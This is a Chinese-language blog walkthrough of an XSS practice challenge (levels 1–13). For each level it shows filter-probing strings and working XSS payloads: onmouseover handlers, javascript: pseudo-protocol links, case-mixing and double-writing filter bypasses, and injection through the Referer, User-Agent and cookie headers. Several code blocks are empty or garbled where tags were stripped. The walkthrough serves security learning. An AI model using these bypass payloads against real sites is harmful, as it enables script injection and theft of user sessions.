xss-challenge(挑战之旅1~13)

好小子!开始我们的XSS挑战之旅吧!

xss-challenge(挑战之旅1~13)_第1张图片

超级无敌xss代码

IPT>OonN'"\/ (hrHRefEF)IPT>

可以使用hackbar,也可以直接在URL的name上输入超级无敌代码,进行观察过滤了哪些字母或字符。可以使用下面两种方法观察

  • 查看源代码(Ctrl+F4)
  • 查看文档目录树(F12)

level1:

点开图片发现,直接欢迎用户test1,

xss-challenge(挑战之旅1~13)_第2张图片

  • 按F12,打开backbar

xss-challenge(挑战之旅1~13)_第3张图片

  • 使用超级无敌代码进行观察

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    

    xss-challenge(挑战之旅1~13)_第4张图片

    xss-challenge(挑战之旅1~13)_第5张图片

  • 可以看到,代码并没有被过滤掉

  • 输入

  • 
    

    xss-challenge(挑战之旅1~13)_第6张图片

    xss-challenge(挑战之旅1~13)_第7张图片

  • 点击确认,下一关

level2:

xss-challenge(挑战之旅1~13)_第8张图片

  • 使用超级无敌xss代码

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    

    xss-challenge(挑战之旅1~13)_第9张图片

    xss-challenge(挑战之旅1~13)_第10张图片

  • 闭合标签,输入以下xss代码

  • ">
    
  • xss-challenge(挑战之旅1~13)_第11张图片

level3:

xss-challenge(挑战之旅1~13)_第12张图片

  • 超级无敌的xss代码代码走起

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    

-xss-challenge(挑战之旅1~13)_第13张图片

  • 可以看到,“<” 被转换成了 比较操作符。换个思路,构造响应事件进行注入

  • xss-challenge(挑战之旅1~13)_第14张图片

    xss-challenge(挑战之旅1~13)_第15张图片

  • ’onmouseover='alert(/xss/)'#发现多了一个单引号,无法闭合
    'onmouseover='alert(/xss/)#写完后,没有反应,需要将鼠标移到代码框。即可过关。onmouseover就是鼠标移动响应事件
    
  • xss-challenge(挑战之旅1~13)_第16张图片

level4:

xss-challenge(挑战之旅1~13)_第17张图片

  • 很好,继续加油!超级无敌xss代码,走起

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    
  • xss-challenge(挑战之旅1~13)_第18张图片

  • 继续使用onmouseover,鼠标响应事件

  • ’onmouseover='alert(/xss/)'#观察发现,是双引号。修改成双引号
    "onmouseover="alert(/xss/)
    
  • xss-challenge(挑战之旅1~13)_第19张图片

  • 将鼠标划到搜索框进行鼠标移动响应事件

    xss-challenge(挑战之旅1~13)_第20张图片

level5:

xss-challenge(挑战之旅1~13)_第21张图片

  • xss超级代码走起

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    
  • xss-challenge(挑战之旅1~13)_第22张图片

  • script和on都有下划线,href和“<"没有被过滤,使用伪协议

  • ">click me!#点我
    
  • xss-challenge(挑战之旅1~13)_第23张图片

level6:

  • 使用超级无敌xss代码

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    
  • xss-challenge(挑战之旅1~13)_第24张图片

    xss-challenge(挑战之旅1~13)_第25张图片

  • 观察得出大小写没有被过滤,可以试试新思路。就决定是你了,大小写

  • ">alert(/xss/)
    
  • xss-challenge(挑战之旅1~13)_第26张图片

level7:

xss-challenge(挑战之旅1~13)_第27张图片

  • 宇宙超级无敌xss实验代码,走起

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    
  • xss-challenge(挑战之旅1~13)_第28张图片

  • on、script、<、都被过滤。非常好!可以使用大小写加双写了

  • ">alert(/xss/)
    
  • xss-challenge(挑战之旅1~13)_第29张图片

level8:

xss-challenge(挑战之旅1~13)_第30张图片

  • 每次都要来一次,超级无敌宇宙第一xss代码,走起!

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    
  • xss-challenge(挑战之旅1~13)_第31张图片

  • 发现实验的代码只有href能用,但是在下面的红框中,表示href有下划线,且代码书写在友情连接里,代码写完后,点击友情连接进行跳转。使用伪协议,进行ASCII编码

  • xss-challenge(挑战之旅1~13)_第32张图片

    level9:

    xss-challenge(挑战之旅1~13)_第33张图片

    • 宇宙无敌超级xss代码走起

    • IPT>OonN'"\/ (hrHRefEF)IPT>
      
    • 竟然显示不合法

    -xss-challenge(挑战之旅1~13)_第34张图片

    • 使用http://www.baidu.com看看会出现什么

    -xss-challenge(挑战之旅1~13)_第35张图片

    • 哦豁,竟然合法,猜测是不是需要加“http://”

    • javascript:alert('http://')
      
    • xss-challenge(挑战之旅1~13)_第36张图片

    level10:

    xss-challenge(挑战之旅1~13)_第37张图片

    • 最强宇宙无敌xss代码走起

    • IPT>OonN'"\/ (hrHRefEF)IPT>
      
    • xss-challenge(挑战之旅1~13)_第38张图片

    • 没有找到。发现下面有三个t_link、t_history、t_sort。在hackbar里面给这三个进行赋值

    • t_sort="onmouseover="alert(/xss/)" #发现只有t_sort能够插入
      
    • xss-challenge(挑战之旅1~13)_第39张图片

    • 但是type的属性是hidden,进行修改。完整代码

    • t_sort="onmouseover="alert(/xss/)" type="text"
      
    • xss-challenge(挑战之旅1~13)_第40张图片

    level11:

    xss-challenge(挑战之旅1~13)_第41张图片

    • 太阳系最强xss代码

    • IPT>OonN'"\/ (hrHRefEF)IPT>
      
    • xss-challenge(挑战之旅1~13)_第42张图片

    • 和第十关一样,根据经验,这个t_ref,应该是Referer。使用hackbar,勾选Referer,在Referer框里填写一下代码

    • "onmouseover="alert(/xss/)" type="text"
      
    • xss-challenge(挑战之旅1~13)_第43张图片

    • xss-challenge(挑战之旅1~13)_第44张图片

    level12:

    xss-challenge(挑战之旅1~13)_第45张图片

  • 最强宇宙代码,走起

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    

-xss-challenge(挑战之旅1~13)_第46张图片

  • t_ua应该是User-Agent,使用hackbar,注入以下鼠标响应事件

  • "onmouseover="alert(/xss/)" type="text"
    
  • xss-challenge(挑战之旅1~13)_第47张图片

  • xss-challenge(挑战之旅1~13)_第48张图片

level13:

xss-challenge(挑战之旅1~13)_第49张图片

  • 宇宙最强xss代码,走起

  • IPT>OonN'"\/ (hrHRefEF)IPT>
    
  • t_cook 应该是cookie值,使用hackbar,注入以下代码

  • t_cook="onmouseover="alert(/xss/)" type="text"
    
  • xss-challenge(挑战之旅1~13)_第50张图片

-xss-challenge(挑战之旅1~13)_第51张图片

level14:

xss-challenge(挑战之旅1~13)_第52张图片

  • 未完待续…
    `

你可能感兴趣的:(xss,前端,大数据)